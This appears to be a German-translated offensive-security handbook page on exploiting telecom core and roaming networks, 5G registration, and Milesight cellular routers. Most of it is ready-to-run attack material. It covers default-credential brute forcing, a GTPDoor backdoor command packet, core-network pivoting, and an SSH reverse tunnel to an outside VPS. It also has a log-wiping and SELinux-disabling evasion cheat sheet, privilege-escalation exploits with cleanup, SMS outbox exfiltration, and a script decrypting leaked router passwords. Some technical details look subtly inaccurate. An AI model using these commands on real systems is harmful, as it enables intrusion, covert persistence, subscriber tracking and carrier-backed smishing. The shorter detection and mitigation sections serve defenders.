Telekommunikations-Netzwerk-Exploitation (GTP / Roaming Environments)

Reading time: 13 minutes

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

Eine überraschend große Anzahl von Hersteller-Netzelementen wird mit hartkodierten SSH/Telnet-Benutzern ausgeliefert, wie z. B. root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … Eine dedizierte wordlist erhöht den Brute-Force-Erfolg deutlich:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

Wenn das Gerät nur eine management VRF bereitstellt, pivotiere zuerst über einen jump host (siehe Abschnitt «SGSN Emu Tunnel» weiter unten).

1.2 Host-Erkennung innerhalb von GRX/IPX

Die meisten GRX-Operatoren erlauben weiterhin ICMP echo über das Backbone. Kombiniere masscan mit den eingebauten gtpv1 UDP probes, um schnell GTP-C listeners zu kartieren:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Auflisten von Teilnehmern – cordscan

Das folgende Go-Tool erzeugt GTP-C Create PDP Context Request-Pakete und protokolliert die Antworten. Jede Antwort offenbart die aktuelle SGSN / MME, die die abgefragte IMSI bedient, und manchmal das vom Teilnehmer besuchte PLMN.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Wichtige Flags:

• --imsi IMSI des Zielteilnehmers
• --oper Home / HNI (MCC+MNC)
• -w Rohpakete in pcap schreiben

Wichtige Konstanten innerhalb des binary können gepatcht werden, um Scans auszuweiten:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. Codeausführung über GTP – GTPDoor

GTPDoor ist ein kleines ELF-Service, das an UDP 2123 bindet und jedes eingehende GTP-C-Paket parst. Wenn die Nutzlast mit einem pre-shared tag beginnt, wird der Rest (AES-128-CBC) entschlüsselt und über /bin/sh -c ausgeführt. stdout/stderr werden in Echo Response-Nachrichten exfiltriert, sodass niemals eine ausgehende Session erstellt wird.

Minimales PoC-Paket (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Detection:

• jeder Host, der unbalanced Echo Requests an die SGSN-IPs sendet
• GTP version flag auf 1 gesetzt, während message type = 1 (Echo) – Abweichung von der Spezifikation

4. Pivoting durch das Core-Netz

4.1 sgsnemu + SOCKS5

OsmoGGSN liefert einen SGSN-Emulator, der einen PDP-Kontext zu einem realen GGSN/PGW aufbauen kann. Nach erfolgreicher Aushandlung erhält Linux eine neue tun0-Schnittstelle, die vom Roaming-Peer erreichbar ist.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

Mit richtigem firewall hair-pinning umgeht dieser Tunnel signalling-only VLANs und bringt dich direkt in die data plane.

4.2 SSH Reverse Tunnel over Port 53

DNS ist in Roaming-Infrastrukturen fast immer offen. Stelle einen internen SSH-Dienst auf deinem VPS bereit, der auf :53 lauscht, und verbinde dich später von zuhause aus:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

Überprüfen Sie, dass GatewayPorts yes auf dem VPS aktiviert ist.

5. Covert Channels

Alle implants implementieren watchdogs, die ihre binaries timestomp und bei Absturz re-spawnen.

6. Defense Evasion Cheatsheet

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Privilege Escalation auf Legacy NE

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Bereinigungstipp:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Werkzeugkasten

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – benutzerdefinierte Tools, die in vorherigen Abschnitten beschrieben wurden.
• FScan : Intranet-TCP-Scans (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS rogue WPAD
• Microsocks + ProxyChains : leichtgewichtige SOCKS5 pivoting
• FRP (≥0.37) : NAT traversal / asset bridging

9. 5G NAS-Registrierungsangriffe: SUCI leaks, Downgrade auf EEA0/EIA0 und NAS replay

Die 5G-Registrierungsprozedur läuft über NAS (Non-Access Stratum) auf NGAP. Bis die NAS-Security durch Security Mode Command/Complete aktiviert ist, sind die initialen Nachrichten unauthenticated und unencrypted. Dieses Vor-Sicherheitsfenster ermöglicht mehrere Angriffsvektoren, wenn man N2-Verkehr beobachten oder manipulieren kann (z. B. on-path im Core, rogue gNB oder Testbed).

Registrierungsablauf (vereinfacht):

• Registration Request: UE sendet SUCI (verschlüsselte SUPI) und Capabilities.
• Authentication: AMF/AUSF senden RAND/AUTN; UE gibt RES* zurück.
• Security Mode Command/Complete: NAS-Integrität und Verschlüsselung werden verhandelt und aktiviert.
• PDU Session Establishment: IP/QoS-Konfiguration.

Laboreinrichtungstipps (nicht-RF):

• Core: Open5GS Standard-Deployment reicht aus, um die Abläufe zu reproduzieren.
• UE: Simulator oder Test-UE; mit Wireshark dekodieren.
• Aktive Tools: 5GReplay (capture/modify/replay NAS innerhalb von NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
• Nützliche Anzeige-Filter in Wireshark:
• ngap.procedure_code == 15 (InitialUEMessage)
• nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)

9.1 Identitäts-Privatsphäre: SUCI-Fehler, die SUPI/IMSI offenlegen

Erwartet: UE/USIM muss SUCI übertragen (SUPI verschlüsselt mit dem öffentlichen Schlüssel des Home-Netzwerks). Das Auffinden einer Klartext-SUPI/IMSI in der Registration Request weist auf einen Datenschutzfehler hin, der persistentes Subscriber-Tracking ermöglicht.

Wie testen:

• Erfassen Sie die erste NAS-Nachricht in InitialUEMessage und untersuchen Sie das Mobile Identity IE.
• Schnelle Wireshark-Prüfungen:
• Es sollte als SUCI und nicht als IMSI dekodiert werden.
• Filter-Beispiele: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci sollte vorhanden sein; Fehlen plus Vorhandensein von imsi weist auf leakage hin.

Was zu sammeln ist:

• MCC/MNC/MSIN, falls exponiert; pro-UE protokollieren und über Zeit/Orte verfolgen.

Abhilfemaßnahmen:

• Nur SUCI-fähige UEs/USIMs erzwingen; Alarm bei jeglicher IMSI/SUPI im initialen NAS.

9.2 Capability-Bidding-Down zu Null-Algorithmen (EEA0/EIA0)

Hintergrund:

• UE gibt unterstützte EEA (Verschlüsselung) und EIA (Integrität) im UE Security Capability IE der Registration Request an.
• Übliche Zuordnungen: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 sind Null-Algorithmen.

Problem:

• Da die Registration Request nicht integritätsgeschützt ist, kann ein on-path-Angreifer die Capability-Bits löschen, um später während des Security Mode Command die Auswahl von EEA0/EIA0 zu erzwingen. Einige Stacks erlauben fälschlicherweise Null-Algorithmen außerhalb von Notdiensten.

Offensive Schritte:

• InitialUEMessage abfangen und das NAS UE Security Capability so ändern, dass nur EEA0/EIA0 angegeben werden.
• Mit Sni5Gect die NAS-Nachricht hooken und die Capability-Bits vor dem Weiterleiten patchen.
• Beobachten, ob AMF Null-Cipher/Integrität akzeptiert und den Security Mode mit EEA0/EIA0 abschließt.

Verifikation/Sichtbarkeit:

• In Wireshark die ausgewählten Algorithmen nach Security Mode Command/Complete bestätigen.
• Beispielausgabe eines passiven Sniffers:

Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Minderungsmaßnahmen (verpflichtend):

• Konfigurieren Sie AMF/policy so, dass EEA0/EIA0 abgelehnt werden, außer dort, wo es strikt vorgeschrieben ist (z. B. Notrufe).
• Bevorzugt EEA2/EIA2 mindestens durchsetzen; protokollieren und alarmieren Sie bei jedem NAS-Sicherheitskontext, der Null-Algorithmen aushandelt.

9.3 Replay der initialen Registration Request (pre-security NAS)

Weil das initiale NAS keine Integrität und Frische besitzt, können aufgezeichnete InitialUEMessage+Registration Request an das AMF erneut abgespielt werden.

PoC-Regel für 5GReplay, um passende Replays weiterzuleiten:

<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to observe:

• Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.

Mitigations:

• Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.

9.4 Tooling pointers (reproducible)

• Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
• Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
• 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
• Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.

9.5 Defensive checklist

• Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
• Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
• Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
• Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.

10. Industrielle Mobilfunk-Router – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Das Ausnutzen öffentlich zugänglicher Web-APIs von industriellen Mobilfunk-Routern ermöglicht heimliches, vom Carrier stammendes smishing in großem Umfang. Milesight UR-series Router bieten einen JSON-RPC–style Endpoint unter /cgi an. Bei Fehlkonfiguration kann die API ohne Authentifizierung abgefragt werden, um SMS-Inbox/Outbox aufzulisten und in manchen Deployments sogar SMS zu senden.

Typical unauthenticated requests (same structure for inbox/outbox):

POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }

{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Antworten enthalten Felder wie timestamp, content, phone_number (E.164) und status (success oder failed). Wiederholte failed-Sendeversuche an dieselbe Nummer sind oft Angreifer-“capability checks”, um zu prüfen, dass ein Router/SIM zustellen kann, bevor sie blasting.

Beispiel-curl, um SMS-Metadaten zu exfiltrate:

curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Hinweise zu auth-Artefakten:

• Ein Teil des Traffics kann ein auth cookie enthalten, aber ein großer Teil der exponierten Geräte antwortet ohne jegliche Authentifizierung auf query_inbox/query_outbox, wenn die Management-Oberfläche internetseitig erreichbar ist.
• In Umgebungen, die auth erfordern, stellen zuvor-leaked credentials (siehe unten) den Zugriff wieder her.

Pfad zur Wiederherstellung von Credentials – CVE-2023-43261:

• Betroffene Familien: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
• Problem: web-served logs (z. B. httpd.log) sind ohne Authentifizierung unter /lang/log/ erreichbar und enthalten Admin-Login-Ereignisse, deren Passwort mit einem hardcodierten AES key/IV verschlüsselt ist, das in client-side JavaScript vorhanden ist.
• Praktischer Zugriff und Entschlüsselung:

curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Minimales Python-Skript zum Entschlüsseln von leaked passwords (AES-128-CBC, hardcoded key/IV):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Hunting- und Detection-Ideen (Netzwerk):

• Alarm bei unauthentifiziertem POST /cgi, dessen JSON-Body base/function auf query_inbox oder query_outbox gesetzt ist.
• Beobachte wiederholte POST /cgi-Bursts, gefolgt von status":"failed"-Einträgen über viele eindeutige Nummern von derselben Quell-IP (capability testing).
• Inventarize Internet-exponierte Milesight-Router; Management auf VPN beschränken; SMS-Funktionen deaktivieren, sofern nicht erforderlich; auf ≥ v35.3.0.7 aktualisieren; Zugangsdaten rotieren und SMS-Logs auf unbekannte Sendungen prüfen.

Shodan/OSINT pivots (examples seen in the wild):

• http.html:"rt_title" matches Milesight router panels.
• Google dorking for exposed logs: "/lang/log/system" ext:log.

Operational impact: using legitimate carrier SIMs inside routers gives very high SMS deliverability/credibility for phishing, while inbox/outbox exposure leaks sensitive metadata at scale.

Detection Ideas

1. Jedes Gerät außer einem SGSN/GGSN, das Create PDP Context Requests initiiert.
2. Nicht-standardmäßige Ports (53, 80, 443), die SSH-Handshakes von internen IPs empfangen.
3. Häufige Echo Requests ohne entsprechende Echo Responses – könnte auf GTPDoor-Beacons hinweisen.
4. Hohe Rate an ICMP echo-reply Traffic mit großen, nicht-null Identifier/Sequence-Feldern.
5. 5G: InitialUEMessage, die NAS Registration Requests enthält, die wiederholt von identischen Endpunkten kommen (replay signal).
6. 5G: NAS Security Mode, der EEA0/EIA0 aushandelt außerhalb von Notfallkontexten.

References

• Palo Alto Unit42 – Infiltration of Global Telecom Networks
• 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)
• Demystifying 5G Security: Understanding the Registration Protocol
• 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
• 3GPP TS 33.501 – Security architecture and procedures for 5G System
• Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)
• CVE-2023-43261 – NVD
• CVE-2023-43261 PoC (win3zz)